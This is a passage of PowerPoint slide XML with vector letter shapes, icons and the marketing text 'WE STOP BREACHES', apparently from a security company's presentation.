                  <a:gd name="T11" fmla="*/ 0 h 109"/>
                  <a:gd name="T12" fmla="*/ 34 w 89"/>
                  <a:gd name="T13" fmla="*/ 103 h 109"/>
                  <a:gd name="T14" fmla="*/ 82 w 89"/>
                  <a:gd name="T15" fmla="*/ 54 h 109"/>
                  <a:gd name="T16" fmla="*/ 34 w 89"/>
                  <a:gd name="T17" fmla="*/ 6 h 109"/>
                  <a:gd name="T18" fmla="*/ 7 w 89"/>
                  <a:gd name="T19" fmla="*/ 6 h 109"/>
                  <a:gd name="T20" fmla="*/ 7 w 89"/>
                  <a:gd name="T21" fmla="*/ 103 h 109"/>
                  <a:gd name="T22" fmla="*/ 34 w 89"/>
                  <a:gd name="T23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109">
                    <a:moveTo>
                      <a:pt x="0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67" y="0"/>
                      <a:pt x="89" y="20"/>
                      <a:pt x="89" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="89" y="89"/>
                      <a:pt x="67" y="109"/>
                      <a:pt x="35" y="109"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="109"/>
                      <a:pt x="0" y="109"/>
                      <a:pt x="0" y="109"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="34" y="103"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="103"/>
                      <a:pt x="82" y="86"/>
                      <a:pt x="82" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="23"/>
                      <a:pt x="62" y="6"/>
                      <a:pt x="34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103"/>
                      <a:pt x="7" y="103"/>
                      <a:pt x="7" y="103"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="34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 userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7785100" y="-3749675"/>
                <a:ext cx="1211263" cy="1939925"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 9 w 71"/>
                  <a:gd name="T1" fmla="*/ 88 h 114"/>
                  <a:gd name="T2" fmla="*/ 37 w 71"/>
                  <a:gd name="T3" fmla="*/ 99 h 114"/>
                  <a:gd name="T4" fmla="*/ 56 w 71"/>
                  <a:gd name="T5" fmla="*/ 83 h 114"/>
                  <a:gd name="T6" fmla="*/ 2 w 71"/>
                  <a:gd name="T7" fmla="*/ 31 h 114"/>
                  <a:gd name="T8" fmla="*/ 38 w 71"/>
                  <a:gd name="T9" fmla="*/ 0 h 114"/>
                  <a:gd name="T10" fmla="*/ 69 w 71"/>
                  <a:gd name="T11" fmla="*/ 11 h 114"/>
                  <a:gd name="T12" fmla="*/ 62 w 71"/>
                  <a:gd name="T13" fmla="*/ 24 h 114"/>
                  <a:gd name="T14" fmla="*/ 38 w 71"/>
                  <a:gd name="T15" fmla="*/ 14 h 114"/>
                  <a:gd name="T16" fmla="*/ 18 w 71"/>
                  <a:gd name="T17" fmla="*/ 31 h 114"/>
                  <a:gd name="T18" fmla="*/ 71 w 71"/>
                  <a:gd name="T19" fmla="*/ 83 h 114"/>
                  <a:gd name="T20" fmla="*/ 36 w 71"/>
                  <a:gd name="T21" fmla="*/ 114 h 114"/>
                  <a:gd name="T22" fmla="*/ 0 w 71"/>
                  <a:gd name="T23" fmla="*/ 99 h 114"/>
                  <a:gd name="T24" fmla="*/ 9 w 71"/>
                  <a:gd name="T25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114">
                    <a:moveTo>
                      <a:pt x="9" y="88"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="88"/>
                      <a:pt x="20" y="99"/>
                      <a:pt x="37" y="99"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="99"/>
                      <a:pt x="56" y="94"/>
                      <a:pt x="56" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="56" y="59"/>
                      <a:pt x="2" y="65"/>
                      <a:pt x="2" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="14"/>
                      <a:pt x="17" y="0"/>
                      <a:pt x="38" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="0"/>
                      <a:pt x="69" y="11"/>
                      <a:pt x="69" y="11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52" y="14"/>
                      <a:pt x="38" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="14"/>
                      <a:pt x="18" y="22"/>
                      <a:pt x="18" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="53"/>
                      <a:pt x="71" y="47"/>
                      <a:pt x="71" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="100"/>
                      <a:pt x="58" y="114"/>
                      <a:pt x="36" y="114"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="114"/>
                      <a:pt x="0" y="99"/>
                      <a:pt x="0" y="99"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9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 userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="9405938" y="-3716338"/>
                <a:ext cx="1535113" cy="1873250"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 397 w 967"/>
                  <a:gd name="T1" fmla="*/ 139 h 1180"/>
                  <a:gd name="T2" fmla="*/ 0 w 967"/>
                  <a:gd name="T3" fmla="*/ 139 h 1180"/>
                  <a:gd name="T4" fmla="*/ 0 w 967"/>
                  <a:gd name="T5" fmla="*/ 0 h 1180"/>
                  <a:gd name="T6" fmla="*/ 967 w 967"/>
                  <a:gd name="T7" fmla="*/ 0 h 1180"/>
                  <a:gd name="T8" fmla="*/ 967 w 967"/>
                  <a:gd name="T9" fmla="*/ 139 h 1180"/>
                  <a:gd name="T10" fmla="*/ 569 w 967"/>
                  <a:gd name="T11" fmla="*/ 139 h 1180"/>
                  <a:gd name="T12" fmla="*/ 569 w 967"/>
                  <a:gd name="T13" fmla="*/ 1180 h 1180"/>
                  <a:gd name="T14" fmla="*/ 397 w 967"/>
                  <a:gd name="T15" fmla="*/ 1180 h 1180"/>
                  <a:gd name="T16" fmla="*/ 397 w 967"/>
                  <a:gd name="T17" fmla="*/ 139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7" h="1180">
                    <a:moveTo>
                      <a:pt x="397" y="139"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="967" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="967" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="569" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="569" y="1180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="1180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397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3"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="11487150" y="-3716338"/>
                <a:ext cx="1346200" cy="1873250"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 79"/>
                  <a:gd name="T1" fmla="*/ 0 h 110"/>
                  <a:gd name="T2" fmla="*/ 33 w 79"/>
                  <a:gd name="T3" fmla="*/ 0 h 110"/>
                  <a:gd name="T4" fmla="*/ 54 w 79"/>
                  <a:gd name="T5" fmla="*/ 3 h 110"/>
                  <a:gd name="T6" fmla="*/ 72 w 79"/>
                  <a:gd name="T7" fmla="*/ 32 h 110"/>
                  <a:gd name="T8" fmla="*/ 52 w 79"/>
                  <a:gd name="T9" fmla="*/ 62 h 110"/>
                  <a:gd name="T10" fmla="*/ 52 w 79"/>
                  <a:gd name="T11" fmla="*/ 62 h 110"/>
                  <a:gd name="T12" fmla="*/ 56 w 79"/>
                  <a:gd name="T13" fmla="*/ 67 h 110"/>
                  <a:gd name="T14" fmla="*/ 79 w 79"/>
                  <a:gd name="T15" fmla="*/ 110 h 110"/>
                  <a:gd name="T16" fmla="*/ 62 w 79"/>
                  <a:gd name="T17" fmla="*/ 110 h 110"/>
                  <a:gd name="T18" fmla="*/ 38 w 79"/>
                  <a:gd name="T19" fmla="*/ 66 h 110"/>
                  <a:gd name="T20" fmla="*/ 15 w 79"/>
                  <a:gd name="T21" fmla="*/ 66 h 110"/>
                  <a:gd name="T22" fmla="*/ 15 w 79"/>
                  <a:gd name="T23" fmla="*/ 110 h 110"/>
                  <a:gd name="T24" fmla="*/ 0 w 79"/>
                  <a:gd name="T25" fmla="*/ 110 h 110"/>
                  <a:gd name="T26" fmla="*/ 0 w 79"/>
                  <a:gd name="T27" fmla="*/ 0 h 110"/>
                  <a:gd name="T28" fmla="*/ 37 w 79"/>
                  <a:gd name="T29" fmla="*/ 53 h 110"/>
                  <a:gd name="T30" fmla="*/ 57 w 79"/>
                  <a:gd name="T31" fmla="*/ 33 h 110"/>
                  <a:gd name="T32" fmla="*/ 48 w 79"/>
                  <a:gd name="T33" fmla="*/ 16 h 110"/>
                  <a:gd name="T34" fmla="*/ 33 w 79"/>
                  <a:gd name="T35" fmla="*/ 13 h 110"/>
                  <a:gd name="T36" fmla="*/ 15 w 79"/>
                  <a:gd name="T37" fmla="*/ 13 h 110"/>
                  <a:gd name="T38" fmla="*/ 15 w 79"/>
                  <a:gd name="T39" fmla="*/ 53 h 110"/>
                  <a:gd name="T40" fmla="*/ 37 w 79"/>
                  <a:gd name="T41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110">
                    <a:moveTo>
                      <a:pt x="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45" y="0"/>
                      <a:pt x="50" y="1"/>
                      <a:pt x="54" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="7"/>
                      <a:pt x="72" y="18"/>
                      <a:pt x="72" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="46"/>
                      <a:pt x="64" y="58"/>
                      <a:pt x="52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4" y="64"/>
                      <a:pt x="56" y="67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0" y="110"/>
                      <a:pt x="0" y="110"/>
                      <a:pt x="0" y="110"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="37" y="53"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="53"/>
                      <a:pt x="57" y="45"/>
                      <a:pt x="57" y="33"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="25"/>
                      <a:pt x="53" y="19"/>
                      <a:pt x="48" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="14"/>
                      <a:pt x="41" y="13"/>
                      <a:pt x="33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53"/>
                      <a:pt x="15" y="53"/>
                      <a:pt x="15" y="53"/>
                    </a:cubicBez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 userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="13447713" y="-3716338"/>
                <a:ext cx="255588" cy="1873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5"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="14489113" y="-3716338"/>
                <a:ext cx="1330325" cy="1873250"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 838"/>
                  <a:gd name="T1" fmla="*/ 0 h 1180"/>
                  <a:gd name="T2" fmla="*/ 161 w 838"/>
                  <a:gd name="T3" fmla="*/ 0 h 1180"/>
                  <a:gd name="T4" fmla="*/ 161 w 838"/>
                  <a:gd name="T5" fmla="*/ 493 h 1180"/>
                  <a:gd name="T6" fmla="*/ 333 w 838"/>
                  <a:gd name="T7" fmla="*/ 493 h 1180"/>
                  <a:gd name="T8" fmla="*/ 633 w 838"/>
                  <a:gd name="T9" fmla="*/ 0 h 1180"/>
                  <a:gd name="T10" fmla="*/ 816 w 838"/>
                  <a:gd name="T11" fmla="*/ 0 h 1180"/>
                  <a:gd name="T12" fmla="*/ 472 w 838"/>
                  <a:gd name="T13" fmla="*/ 558 h 1180"/>
                  <a:gd name="T14" fmla="*/ 472 w 838"/>
                  <a:gd name="T15" fmla="*/ 558 h 1180"/>
                  <a:gd name="T16" fmla="*/ 838 w 838"/>
                  <a:gd name="T17" fmla="*/ 1180 h 1180"/>
                  <a:gd name="T18" fmla="*/ 655 w 838"/>
                  <a:gd name="T19" fmla="*/ 1180 h 1180"/>
                  <a:gd name="T20" fmla="*/ 333 w 838"/>
                  <a:gd name="T21" fmla="*/ 633 h 1180"/>
                  <a:gd name="T22" fmla="*/ 161 w 838"/>
                  <a:gd name="T23" fmla="*/ 633 h 1180"/>
                  <a:gd name="T24" fmla="*/ 161 w 838"/>
                  <a:gd name="T25" fmla="*/ 1180 h 1180"/>
                  <a:gd name="T26" fmla="*/ 0 w 838"/>
                  <a:gd name="T27" fmla="*/ 1180 h 1180"/>
                  <a:gd name="T28" fmla="*/ 0 w 838"/>
                  <a:gd name="T29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8" h="1180">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="161" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="493"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="333" y="493"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="633" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="816" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="558"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="558"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="838" y="1180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="655" y="1180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="333" y="633"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="633"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="1180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1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6"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="16398875" y="-3716338"/>
                <a:ext cx="1125538" cy="1873250"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 709"/>
                  <a:gd name="T1" fmla="*/ 0 h 1180"/>
                  <a:gd name="T2" fmla="*/ 688 w 709"/>
                  <a:gd name="T3" fmla="*/ 0 h 1180"/>
                  <a:gd name="T4" fmla="*/ 688 w 709"/>
                  <a:gd name="T5" fmla="*/ 139 h 1180"/>
                  <a:gd name="T6" fmla="*/ 161 w 709"/>
                  <a:gd name="T7" fmla="*/ 139 h 1180"/>
                  <a:gd name="T8" fmla="*/ 161 w 709"/>
                  <a:gd name="T9" fmla="*/ 515 h 1180"/>
                  <a:gd name="T10" fmla="*/ 591 w 709"/>
                  <a:gd name="T11" fmla="*/ 515 h 1180"/>
                  <a:gd name="T12" fmla="*/ 591 w 709"/>
                  <a:gd name="T13" fmla="*/ 654 h 1180"/>
                  <a:gd name="T14" fmla="*/ 161 w 709"/>
                  <a:gd name="T15" fmla="*/ 654 h 1180"/>
                  <a:gd name="T16" fmla="*/ 161 w 709"/>
                  <a:gd name="T17" fmla="*/ 1029 h 1180"/>
                  <a:gd name="T18" fmla="*/ 709 w 709"/>
                  <a:gd name="T19" fmla="*/ 1029 h 1180"/>
                  <a:gd name="T20" fmla="*/ 709 w 709"/>
                  <a:gd name="T21" fmla="*/ 1180 h 1180"/>
                  <a:gd name="T22" fmla="*/ 0 w 709"/>
                  <a:gd name="T23" fmla="*/ 1180 h 1180"/>
                  <a:gd name="T24" fmla="*/ 0 w 709"/>
                  <a:gd name="T25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9" h="1180">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="688" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="688" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="591" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="591" y="654"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="654"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="1029"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="709" y="1029"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="709" y="1180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1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0" name="Picture 9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711" y="4130314"/>
              <a:ext cx="1298098" cy="101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193" y="2272440"/>
            <a:ext cx="914161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10350" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="ITC Avant Garde Pro Md" charset="0"/>
                <a:ea typeface="ITC Avant Garde Pro Md" charset="0"/>
                <a:cs typeface="ITC Avant Garde Pro Md" charset="0"/>
              </a:rPr>
              <a:t>BREACHES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92" y="1642532"/>
            <a:ext cx="9141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6000" kern="0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="ITC Avant Garde Gothic Pro Demi" charset="0"/>
                <a:ea typeface="ITC Avant Garde Gothic Pro Demi" charset="0"/>
                <a:cs typeface="ITC Avant Garde Gothic Pro Demi" charset="0"/>
              </a:rPr>
              <a:t>WE STOP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38594" y="4238535"/>
            <a:ext cx="3454506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4697" y="4238535"/>
            <a:ext cx="3454506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45255" y="625954"/>
            <a:ext cx="3247845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4697" y="625954"/>
            <a:ext cx="3247845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054848" y="-971551"/>
            <a:ext cx="1019177" cy="2359026"/>
            <a:chOff x="4054847" y="-971551"/>
            <a:chExt cx="1019177" cy="2359026"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="8" name="Group 7"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4054847" y="-971551"/>
              <a:ext cx="1019177" cy="2359026"/>
              <a:chOff x="4054847" y="-971551"/>
              <a:chExt cx="1019177" cy="2359026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4054847" y="-971551"/>
                <a:ext cx="538163" cy="2359026"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 337"/>
                  <a:gd name="T1" fmla="*/ 0 h 1505"/>
                  <a:gd name="T2" fmla="*/ 0 w 337"/>
                  <a:gd name="T3" fmla="*/ 0 h 1505"/>
                  <a:gd name="T4" fmla="*/ 0 w 337"/>
                  <a:gd name="T5" fmla="*/ 1505 h 1505"/>
                  <a:gd name="T6" fmla="*/ 337 w 337"/>
                  <a:gd name="T7" fmla="*/ 1346 h 1505"/>
                  <a:gd name="T8" fmla="*/ 337 w 337"/>
                  <a:gd name="T9" fmla="*/ 0 h 1505"/>
                  <a:gd name="T10" fmla="*/ 0 w 337"/>
                  <a:gd name="T11" fmla="*/ 0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7" h="1505">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1505"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="1346"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3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 flipH="1">
                <a:off x="4535861" y="-971551"/>
                <a:ext cx="538163" cy="2359026"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 337"/>
                  <a:gd name="T1" fmla="*/ 0 h 1505"/>
                  <a:gd name="T2" fmla="*/ 0 w 337"/>
                  <a:gd name="T3" fmla="*/ 0 h 1505"/>
                  <a:gd name="T4" fmla="*/ 0 w 337"/>
                  <a:gd name="T5" fmla="*/ 1505 h 1505"/>
                  <a:gd name="T6" fmla="*/ 337 w 337"/>
                  <a:gd name="T7" fmla="*/ 1346 h 1505"/>
                  <a:gd name="T8" fmla="*/ 337 w 337"/>
                  <a:gd name="T9" fmla="*/ 0 h 1505"/>
                  <a:gd name="T10" fmla="*/ 0 w 337"/>
                  <a:gd name="T11" fmla="*/ 0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7" h="1505">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1505"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="1346"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3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06316" y="288308"/>
              <a:ext cx="675518" cy="553192"/>
              <a:chOff x="660670" y="-1674119"/>
              <a:chExt cx="2165350" cy="1773237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660670" y="-1674119"/>
                <a:ext cx="2165350" cy="1143000"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 201 w 1512"/>
                  <a:gd name="T1" fmla="*/ 797 h 797"/>
                  <a:gd name="T2" fmla="*/ 201 w 1512"/>
                  <a:gd name="T3" fmla="*/ 716 h 797"/>
                  <a:gd name="T4" fmla="*/ 32 w 1512"/>
                  <a:gd name="T5" fmla="*/ 517 h 797"/>
                  <a:gd name="T6" fmla="*/ 75 w 1512"/>
                  <a:gd name="T7" fmla="*/ 414 h 797"/>
                  <a:gd name="T8" fmla="*/ 335 w 1512"/>
                  <a:gd name="T9" fmla="*/ 392 h 797"/>
                  <a:gd name="T10" fmla="*/ 392 w 1512"/>
                  <a:gd name="T11" fmla="*/ 335 h 797"/>
                  <a:gd name="T12" fmla="*/ 414 w 1512"/>
                  <a:gd name="T13" fmla="*/ 75 h 797"/>
                  <a:gd name="T14" fmla="*/ 516 w 1512"/>
                  <a:gd name="T15" fmla="*/ 33 h 797"/>
                  <a:gd name="T16" fmla="*/ 715 w 1512"/>
                  <a:gd name="T17" fmla="*/ 201 h 797"/>
                  <a:gd name="T18" fmla="*/ 796 w 1512"/>
                  <a:gd name="T19" fmla="*/ 201 h 797"/>
                  <a:gd name="T20" fmla="*/ 995 w 1512"/>
                  <a:gd name="T21" fmla="*/ 33 h 797"/>
                  <a:gd name="T22" fmla="*/ 1098 w 1512"/>
                  <a:gd name="T23" fmla="*/ 75 h 797"/>
                  <a:gd name="T24" fmla="*/ 1120 w 1512"/>
                  <a:gd name="T25" fmla="*/ 335 h 797"/>
                  <a:gd name="T26" fmla="*/ 1177 w 1512"/>
                  <a:gd name="T27" fmla="*/ 392 h 797"/>
                  <a:gd name="T28" fmla="*/ 1437 w 1512"/>
                  <a:gd name="T29" fmla="*/ 414 h 797"/>
                  <a:gd name="T30" fmla="*/ 1479 w 1512"/>
                  <a:gd name="T31" fmla="*/ 517 h 797"/>
                  <a:gd name="T32" fmla="*/ 1311 w 1512"/>
                  <a:gd name="T33" fmla="*/ 716 h 797"/>
                  <a:gd name="T34" fmla="*/ 1311 w 1512"/>
                  <a:gd name="T35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12" h="797">
                    <a:moveTo>
                      <a:pt x="201" y="797"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="221" y="773"/>
                      <a:pt x="221" y="739"/>
                      <a:pt x="201" y="716"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="517"/>
                      <a:pt x="32" y="517"/>
                      <a:pt x="32" y="517"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="478"/>
                      <a:pt x="24" y="418"/>
                      <a:pt x="75" y="414"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="335" y="392"/>
                      <a:pt x="335" y="392"/>
                      <a:pt x="335" y="392"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="365" y="390"/>
                      <a:pt x="389" y="366"/>
                      <a:pt x="392" y="335"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="414" y="75"/>
                      <a:pt x="414" y="75"/>
                      <a:pt x="414" y="75"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="418" y="25"/>
                      <a:pt x="478" y="0"/>
                      <a:pt x="516" y="33"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="715" y="201"/>
                      <a:pt x="715" y="201"/>
                      <a:pt x="715" y="201"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="739" y="221"/>
                      <a:pt x="773" y="221"/>
                      <a:pt x="796" y="201"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="995" y="33"/>
                      <a:pt x="995" y="33"/>
                      <a:pt x="995" y="33"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1034" y="0"/>
                      <a:pt x="1094" y="25"/>
                      <a:pt x="1098" y="75"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1120" y="335"/>
                      <a:pt x="1120" y="335"/>
                      <a:pt x="1120" y="335"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1122" y="366"/>
                      <a:pt x="1146" y="390"/>
                      <a:pt x="1177" y="392"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1437" y="414"/>
                      <a:pt x="1437" y="414"/>
                      <a:pt x="1437" y="414"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1487" y="418"/>
                      <a:pt x="1512" y="478"/>
                      <a:pt x="1479" y="517"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1311" y="716"/>
                      <a:pt x="1311" y="716"/>
                      <a:pt x="1311" y="716"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1291" y="739"/>
                      <a:pt x="1291" y="773"/>
                      <a:pt x="1311" y="797"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="412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938482" y="-1207394"/>
                <a:ext cx="1536700" cy="1306512"/>
                <a:chOff x="825500" y="-1344613"/>
                <a:chExt cx="1536700" cy="1306512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1025525" y="-1344613"/>
                  <a:ext cx="1211263" cy="925513"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 423 w 846"/>
                    <a:gd name="T1" fmla="*/ 0 h 646"/>
                    <a:gd name="T2" fmla="*/ 423 w 846"/>
                    <a:gd name="T3" fmla="*/ 0 h 646"/>
                    <a:gd name="T4" fmla="*/ 0 w 846"/>
                    <a:gd name="T5" fmla="*/ 423 h 646"/>
                    <a:gd name="T6" fmla="*/ 0 w 846"/>
                    <a:gd name="T7" fmla="*/ 646 h 646"/>
                    <a:gd name="T8" fmla="*/ 846 w 846"/>
                    <a:gd name="T9" fmla="*/ 646 h 646"/>
                    <a:gd name="T10" fmla="*/ 846 w 846"/>
                    <a:gd name="T11" fmla="*/ 423 h 646"/>
                    <a:gd name="T12" fmla="*/ 423 w 846"/>
                    <a:gd name="T13" fmla="*/ 0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6" h="646">
                      <a:moveTo>
                        <a:pt x="423" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="423" y="0"/>
                        <a:pt x="423" y="0"/>
                        <a:pt x="423" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="189" y="0"/>
                        <a:pt x="0" y="189"/>
                        <a:pt x="0" y="423"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="646"/>
                        <a:pt x="0" y="646"/>
                        <a:pt x="0" y="646"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="846" y="646"/>
                        <a:pt x="846" y="646"/>
                        <a:pt x="846" y="646"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="846" y="423"/>
                        <a:pt x="846" y="423"/>
                        <a:pt x="846" y="423"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="846" y="189"/>
                        <a:pt x="657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>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="en-US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825500" y="-323851"/>
                  <a:ext cx="1536700" cy="285750"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 973 w 1072"/>
                    <a:gd name="T1" fmla="*/ 199 h 199"/>
                    <a:gd name="T2" fmla="*/ 100 w 1072"/>
                    <a:gd name="T3" fmla="*/ 199 h 199"/>
                    <a:gd name="T4" fmla="*/ 0 w 1072"/>
                    <a:gd name="T5" fmla="*/ 99 h 199"/>
                    <a:gd name="T6" fmla="*/ 0 w 1072"/>
